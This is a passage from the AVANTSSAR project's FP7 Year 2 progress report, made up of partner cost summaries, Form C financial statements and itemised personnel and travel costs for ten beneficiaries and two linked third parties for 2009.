Benef. 2, Adjustment No, ETH ZURICH: RTD 195,068 / 146,301; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 195,068 / 146,301; Req. EC Contrib. 146,301; Receipts 0

Benef. 3, Adjustment No, INRIA: RTD 160,744 / 120,558; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 160,744 / 120,558; Req. EC Contrib. 120,558; Receipts 0

3rd Party -999 linked to Benef. 3, Adjustment No, UNIVERSITE: RTD 0 / 0; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 0 / 0; Req. EC Contrib. 0; Receipts 0

Benef. 4, Adjustment No, UPS-IRIT: RTD 82,096 / 61,572; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 82,096 / 61,572; Req. EC Contrib. 61,572; Receipts 0

3rd Party -998 linked to Benef. 4, Adjustment No, CNRS: RTD 34,760 / 26,070; Demonstration 0 / 0; Management 2,816 / 2,816; Other 1,844 / 1,844; Total 39,420 / 30,730; Req. EC Contrib. 30,730; Receipts 0

Benef. 5, Adjustment No, UGDIST: RTD 158,408 / 118,806; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 158,408 / 118,806; Req. EC Contrib. 118,806; Receipts 0

Benef. 6, Adjustment No, IBM RESEARCH: RTD 136,989 / 68,494; Demonstration 0 / 0; Management 7,515 / 7,515; Other 0 / 0; Total 144,504 / 76,009; Req. EC Contrib. 76,009; Receipts 0

Benef. 7, Adjustment No, OPENTRUST: RTD 39,386 / 29,539; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 39,386 / 29,539; Req. EC Contrib. 29,539; Receipts 0

Benef. 8, Adjustment No, IEAT: RTD 38,376 / 28,782; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 38,376 / 28,782; Req. EC Contrib. 28,782; Receipts 0

Benef. 9, Adjustment No, SAP: RTD 464,903 / 232,451; Demonstration 0 / 0; Management 1,449 / 1,449; Other 0 / 0; Total 466,352 / 233,900; Req. EC Contrib. 233,900; Receipts 0

Benef. 9, Adjustment Yes (1), SAP: RTD -15,805 / -7,902; Demonstration 0 / 0; Management -34 / -34; Other 0 / 0; Total -15,839 / -7,936; Req. EC Contrib. -7,936; Receipts 0

Benef. 10, Adjustment No, SIEMENS: RTD 377,620 / 188,810; Demonstration 0 / 0; Management 0 / 0; Other 0 / 0; Total 377,620 / 188,810; Req. EC Contrib. 188,810; Receipts 0

Total: RTD 1,828,351 / 1,130,335; Demonstration 0 / 0; Management 48,123 / 48,123; Other 1,844 / 1,844; Total 1,878,318 / 1,180,302; Req. EC Contrib. 1,180,302; Receipts 0


Table 19: Costs for Period P2: UNIVR

FP7 - Grant Agreement - Annex VI - Collaborative project

2 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
Legal Name UNIVERSITA DEGLI STUDI DI VERONA
Participant Identity Code 999838074
Organisation Short Name UNIVR
Beneficiary nr 1
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 87,492 0 16,680 0 104,172
Subcontracting 0 0 0 0 0
Other direct costs 9,862 0 3,775 0 13,637
Indirect costs 58,412 0 12,273 0 70,685
Total costs 155,766 0 32,728 0 188,494
Maximum EU contribution 116,824 0 32,728 0 149,552
Requested EU contribution 149,552

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

3. Declaration of interest yielded by the pre-financing (to be completed only by the coordinator)

Did the pre-financing you received generate any interest according to Art.II.19? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Prof. Carlo Combi

Date & signature


Table 20: Costs for Period P2: UNIVR adjustment

FP7 - Grant Agreement - Annex VI - Collaborative project

3 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? Yes
Adjustment relates to Period: 2
Legal Name UNIVERSITA DEGLI STUDI DI VERONA
Participant Identity Code 999838074
Organisation Short Name UNIVR
Beneficiary nr 1
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 0 0 0 0 0
Subcontracting 0 0 0 0 0
Other direct costs 25 0 3,657 0 3,682
Indirect costs 15 0 -8 0 7
Total costs 40 0 3,649 0 3,689
Maximum EU contribution 30 0 3,649 0 3,679
Requested EU contribution 3,679

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

3. Declaration of interest yielded by the pre-financing (to be completed only by the coordinator)

Did the pre-financing you received generate any interest according to Art.II.19? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Prof. Carlo Combi

Date & signature


Table 21: Costs for Period P2: UNIVR (details)

Personnel, subcontracting and other major direct cost items for beneficiary 1 (UNIVR) for the period P2

Work Package | Item description | Amount | Explanations
1, 2, 3, 4, 5, 6 | Personnel costs | 104,172 | Salaries
| Subcontracting | 0 |
1, 2, 3, 4, 5, 6 | Equipment | 1,691 | 1 laptop, 2 palmtops, server, hard disk
1, 6 | Website and project repository | 287 | Website, repository, presentation tools
1, 2, 3, 4, 5, 6 | Travel | 11,659 | Project & working meetings, project presentations and dissemination
| Remaining direct costs | 3,682 | Adjustment (including interests refund)
TOTAL DIRECT COSTS | | 121,491 |


Table 22: Costs for Period P2: ETH Zurich

FP7 - Grant Agreement - Annex VI - Collaborative project

4 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
Legal Name Eidgenössische Technische Hochschule Zürich
Participant Identity Code 999979015
Organisation Short Name ETH ZURICH
Beneficiary nr 2
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 118,063 0 0 0 118,063
Subcontracting 0 0 0 0 0
Other direct costs 3,855 0 0 0 3,855
Indirect costs 73,150 0 0 0 73,150
Total costs 195,068 0 0 0 195,068
Maximum EU contribution 146,301 0 0 0 146,301
Requested EU contribution 146,301

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Sabine Meens

Date & signature


Table 23: Costs for Period P2: ETH Zurich (details)

Personnel, subcontracting and other major direct cost items for beneficiary 2 (ETH Zurich) for the period P2

Work Package | Item description | Amount | Explanations
1, 2, 3, 4 | Personnel costs | 118,063.00 | One post-doc and one PhD student.
| Subcontracting | |
General | Remaining direct costs | 3,855.00 | Travel and expenses for project meetings.
TOTAL DIRECT COSTS | | 121,918.00 |


Table 24: Costs for Period P2: INRIA

FP7 - Grant Agreement - Annex VI - Collaborative project

5 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
Legal Name INSTITUT NATIONAL DE RECHERCHE EN INFORMATIQUE ET EN AUTOMATIQUE
Participant Identity Code 999547074
Organisation Short Name INRIA
Beneficiary nr 3
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 69,730 0 0 0 69,730
Subcontracting 0 0 0 0 0
Other direct costs 8,263 0 0 0 8,263
Indirect costs 82,751 0 0 0 82,751
Total costs 160,744 0 0 0 160,744
Maximum EU contribution 120,558 0 0 0 120,558
Requested EU contribution 120,558

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? Yes

Name of the auditor Agent Comptable INRIA
Cost of the certificate (in €) 0

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Karl TOMBRE

Date & signature


Table 25: Costs for Period P2: INRIA (details)

Personnel, subcontracting and other major direct cost items for beneficiary 3 (INRIA) for the period P2

Work Package | Item description | Amount | Explanations
1, 2, 3, 4, 5, 6 | Personnel costs | 69,730.00 | Salaries (Senior researcher and PhD Students)
| Subcontracting | |
1, 2, 3, 4, 5, 6 | Travel expenses | 8,263.00 | Participation in 3 project working meetings
TOTAL DIRECT COSTS | | 77,993.00 |


Table 26: Costs for Period P2: University of Nancy

FP7 - Grant Agreement - Annex VI - Collaborative project

6 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by Third Party) Only applicable if special clause nr 10 is used

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
3rd party legal Name UNIVERSITE DE NANCY 2
3rd party Organisation Short Name UNIVERSITE NANCY II
Working for beneficiary nr 3
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 0 0 0 0 0
Subcontracting 0 0 0 0 0
Other direct costs 0 0 0 0 0
Indirect costs 0 0 0 0 0
Total costs 0 0 0 0 0
Maximum EU contribution 0 0 0 0 0
Requested EU contribution

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Francois Le Poultier

Date & signature


Table 27: Costs for Period P2: UPS-IRIT

FP7 - Grant Agreement - Annex VI - Collaborative project

7 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
Legal Name UNIVERSITE PAUL SABATIER TOULOUSE III
Participant Identity Code 999851169
Organisation Short Name UPS-IRIT
Beneficiary nr 4
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 44,081 0 0 0 44,081
Subcontracting 0 0 0 0 0
Other direct costs 7,229 0 0 0 7,229
Indirect costs 30,786 0 0 0 30,786
Total costs 82,096 0 0 0 82,096
Maximum EU contribution 61,572 0 0 0 61,572
Requested EU contribution 61,572

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Gilles Fourtanier

Date & signature


Table 28: Costs for Period P2: UPS-IRIT (details)

Personnel, subcontracting and other major direct cost items for beneficiary 4 (UPS-IRIT) for the period P2

Work Package | Item description | Amount | Explanations
2, 3, 4, 5, 6 | Personnel costs | 44,081 | Cheikh, Chevalier, El Houri, Feuillade, and Kourjieh
| Subcontracting | |
2, 3, 4, 5, 6 | Remaining direct costs | 7,229 | Travel expenses and small equipment
TOTAL DIRECT COSTS | | 51,309 |


Table 29: Costs for Period P2: CNRS

FP7 - Grant Agreement - Annex VI - Collaborative project

8 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by Third Party) Only applicable if special clause nr 10 is used

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
3rd party legal Name CENTRE NATIONAL DE LA RECHERCHE SCIENTIFIQUE
3rd party Organisation Short Name CNRS
Working for beneficiary nr 4
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 21,725 0 1,760 1,153 24,638
Subcontracting 0 0 0 0 0
Other direct costs 0 0 0 0 0
Indirect costs 13,035 0 1,056 691 14,782
Total costs 34,760 0 2,816 1,844 39,420
Maximum EU contribution 26,070 0 2,816 1,844 30,730
Requested EU contribution 30,730

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Mme Armelle Barelli

Date & signature


Table 30: Costs for Period P2: CNRS (details)

Personnel, subcontracting and other major direct cost items for beneficiary 4 (CNRS) for the period P2

Work Package | Item description | Amount | Explanations
1, 2, 3, 5, 6 | Personnel costs | 24,638.00 | Philippe Balbiani
TOTAL DIRECT COSTS | | 24,638.00 |


Table 31: Costs for Period P2: UGDIST

FP7 - Grant Agreement - Annex VI - Collaborative project

9 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
Legal Name UNIVERSITA DEGLI STUDI DI GENOVA
Participant Identity Code 999976687
Organisation Short Name UGDIST
Beneficiary nr 5
Funding % for RTD activities (A) 75.0
If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 84,579 0 0 0 84,579
Subcontracting 0 0 0 0 0
Other direct costs 14,426 0 0 0 14,426
Indirect costs 59,403 0 0 0 59,403
Total costs 158,408 0 0 0 158,408
Maximum EU contribution 118,806 0 0 0 118,806
Requested EU contribution 118,806

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Riccardo Minciardi, Renato Zaccaria

Date & signature


Table 32: Costs for Period P2: UGDIST (details)

Personnel, subcontracting and other major direct cost items for beneficiary 5 (UGDIST) for the period P2

Work Package | Item description | Amount | Explanations
1, 2, 3, 4, 5, 6 | Personnel costs | 84,579.00 | Armando, Di Manzo, Giunchiglia, Carbone, Ponta, Cappai
| Subcontracting | |
1, 2, 3, 4, 5, 6 | Remaining direct costs | 14,426.00 | Trips
TOTAL DIRECT COSTS | | 99,005.00 |


Table 33: Costs for Period P2: IBM

FP7 - Grant Agreement - Annex VI - Collaborative project

10 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471
Project Acronym AVANTSSAR
Funding scheme Collaborative project
Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No
Legal Name IBM RESEARCH GMBH
Participant Identity Code 999909854
Organisation Short Name IBM RESEARCH GMBH
Beneficiary nr 6
Funding % for RTD activities (A) 50.0
If flat rate for indirect costs, specify % N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)
Personnel costs 83,896 0 4,822 0 88,718
Subcontracting 0 0 0 0 0
Other direct costs 6,236 0 0 0 6,236
Indirect costs 46,857 0 2,693 0 49,550
Total costs 136,989 0 7,515 0 144,504
Maximum EU contribution 68,494 0 7,515 0 76,009
Requested EU contribution 76,009

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art.II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1? No

Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €), if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art.II.4.4? No

Name of the auditor
Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art.II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp
Name of the Person(s) Authorised to sign this Financial Statement

Thomas Schlund

Date & signature

FP7-ICT-2007-1Project No. 216471

D1.4: Progress/Assessment Report for Year 2 (Period P2: 01.01.09 —31.12.09) 112/165

Table 34: Costs for Period P2: IBM (details)

Personnel, subcontracting and other major direct cost items for beneficiary 6 (IBM) for the period P2

Work Package   Item description                          Amount      Explanations
1,2,3,4,5,6    Personnel costs (Including Management)    88,718.00   Salary of 1 postdoc for the second project
1,2,3,4,5,6    Travel                                     6,236.00   General meeting, meeting on WP3/4, as well as conferences and workshops where AVANTSSAR work was presented
               TOTAL DIRECT COSTS                        94,954.00


Table 35: Costs for Period P2: OpenTrust

FP7 - Grant Agreement - Annex VI - Collaborative project

11 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number: 216471
Funding scheme: Collaborative project
Project Acronym: AVANTSSAR

Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No

Legal Name: OPENTRUST
Participant Identity Code: 999745245

Organisation Short Name: OPENTRUST
Beneficiary nr: 7

Funding % for RTD activities (A): 75.0
If flat rate for indirect costs, specify %: N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity             RTD (A)   Demonstration (B)   Management (C)   Other (D)   Total (A+B+C+D)
Personnel costs               16,023                   0                0           0            16,023
Subcontracting                     0                   0                0           0                 0
Other direct costs             3,836                   0                0           0             3,836
Indirect costs                19,527                   0                0           0            19,527
Total costs                   39,386                   0                0           0            39,386
Maximum EU contribution       29,539                   0                0           0            29,539
Requested EU contribution     29,539

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art. II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art. II.14.1? No
Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €), if charged under this project:

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €):

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art. II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art. II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp

Name of the Person(s) Authorised to sign this Financial Statement:

Ludwig Spiesser

Date & signature


Table 36: Costs for Period P2: OpenTrust (details)

Personnel, subcontracting and other major direct cost items for beneficiary 7 (OpenTrust) for the period P2

Work Package   Item description      Amount      Explanations
1,2,3,4,5,6    Personnel costs       16,023.00
               Subcontracting
3,2            Travel                 3,836.00   Travel expenses: Aslan V2 meeting 1 (Genova), Aslan V2 meeting 2 (Genova), Orchestration work meeting with INRIA
               TOTAL DIRECT COSTS    19,859.00


Table 37: Costs for Period P2: IEAT


Form C - Financial Statement (to be filled in by each beneficiary)

Project Number: 216471
Funding scheme: Collaborative project
Project Acronym: AVANTSSAR

Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No

Legal Name: INSTITUTUL E-AUSTRIA TIMISOARA
Participant Identity Code: 999624674

Organisation Short Name: IEAT
Beneficiary nr: 8

Funding % for RTD activities (A): 75.0
If flat rate for indirect costs, specify %: 60

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity             RTD (A)   Demonstration (B)   Management (C)   Other (D)   Total (A+B+C+D)
Personnel costs               22,800                   0                0           0            22,800
Subcontracting                     0                   0                0           0                 0
Other direct costs             1,185                   0                0           0             1,185
Indirect costs                14,391                   0                0           0            14,391
Total costs                   38,376                   0                0           0            38,376
Maximum EU contribution       28,782                   0                0           0            28,782
Requested EU contribution     28,782

2. Declaration of receipts

